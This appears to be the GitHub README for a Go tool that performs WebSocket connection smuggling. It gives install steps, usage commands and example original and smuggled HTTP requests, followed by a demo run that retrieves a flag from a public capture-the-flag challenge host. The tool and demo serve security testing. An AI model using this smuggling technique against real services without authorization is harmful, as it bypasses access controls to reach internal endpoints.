Home

Awesome

<img src="https://user-images.githubusercontent.com/13212227/70248653-8de45d00-17be-11ea-9602-6b8f2754ddfb.png">

<a href="https://twitter.com/intent/follow?screen_name=hahwul"><img src="https://img.shields.io/twitter/follow/hahwul?style=flat-square"></a>

websocket-connection-smuggler

Dependency

$ go get -u github.com/c-bata/go-prompt

Install

$ go get github.com/hahwul/websocket-connection-smuggler

or

$ git clone https://github.com/hahwul/websocket-connection-smuggler
$ cd websocket-connection-smuggler
$ go build
$ ./websocket-connection-smuggler

Usage

1. run wcs(websocket-connection-smuggler)

$ websocket-connection-smuggler

2. set target address(domain or ip address)

$ WCS(...) > set target {your target}

3. is SSL? (default is false)

# HTTPS
$ WCS(...) > set ssl true

# HTTP
$ WCS(...) > set ssl false

4. set original request(o_data)

It used the default editor defined in the environment variables, such as vim and no. If you don't have any special settings, vim is the default.

$ WCS(...) > set o_data

e.g

GET /socket.io/?transport-websocket HTTP/1.1
Host: localhost:80
Sec-WebSocket-Version: 4444
Upgrade: websocket

5. set smuggling reqeust(s_data)

It used the default editor defined in the environment variables, such as vim and no. If you don't have any special settings, vim is the default.

$ WCS(...) > set s_data

e.g

GET /flag HTTP/1.1 
Host: localhost:5000

Test to 0ang3el Websocket Smuggling Challenge


             ___          
            /   \\        
       /\\ | . . \\       
     ////\\|     ||       
   ////   \\ ___//\       
  ///      \\      \      
 ///       |\\      |     
//         | \\  \   \    
/          |  \\  \   \   
           |   \\ /   /   
           |    \/   /    
            ---------
     WebSocket Connection Smuggler
     by @hahwul

WCS(target=>None | ssl=>false ) > set target challenge.0ang3el.tk:80
WCS(target=>challenge.0ang3el.tk:80 | ssl=>false ) > set o_data
WCS(target=>challenge.0ang3el.tk:80 | ssl=>false ) > set s_data
WCS(target=>challenge.0ang3el.tk:80 | ssl=>false ) > send
GET /socket.io/?transport-websocket HTTP/1.1
Host: localhost:80
Sec-WebSocket-Version: 4444
Upgrade: websocket

2019/11/30 03:39:15 HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 49
Date: Fri, 29 Nov 2019 18:39:15 GMT

{"flag": "In 50VI37 rUS5I4 vODK@ DRiNKs YOu!!!"}
gth: 119
Date: Fri, 29 Nov 2019 18:39:14 GMT

        �0{"pingInterval":25000,"pingTimeout":60000,"upgrades":["websocket"],"sid":"5148720e07f240a99e6aa7457f41686f"}�40

Video on asciinema

asciicast

Donate

I like coffee! I'm a coffee addict.<br> <a href="https://www.paypal.me/hahwul"><img src="https://www.paypalobjects.com/digitalassets/c/website/logo/full-text/pp_fc_hl.svg" height="50px"></a> <a href="https://www.buymeacoffee.com/hahwul"><img src="https://cdn.buymeacoffee.com/buttons/default-black.png" alt="Buy Me A Coffee" height="50px"></a>

Reference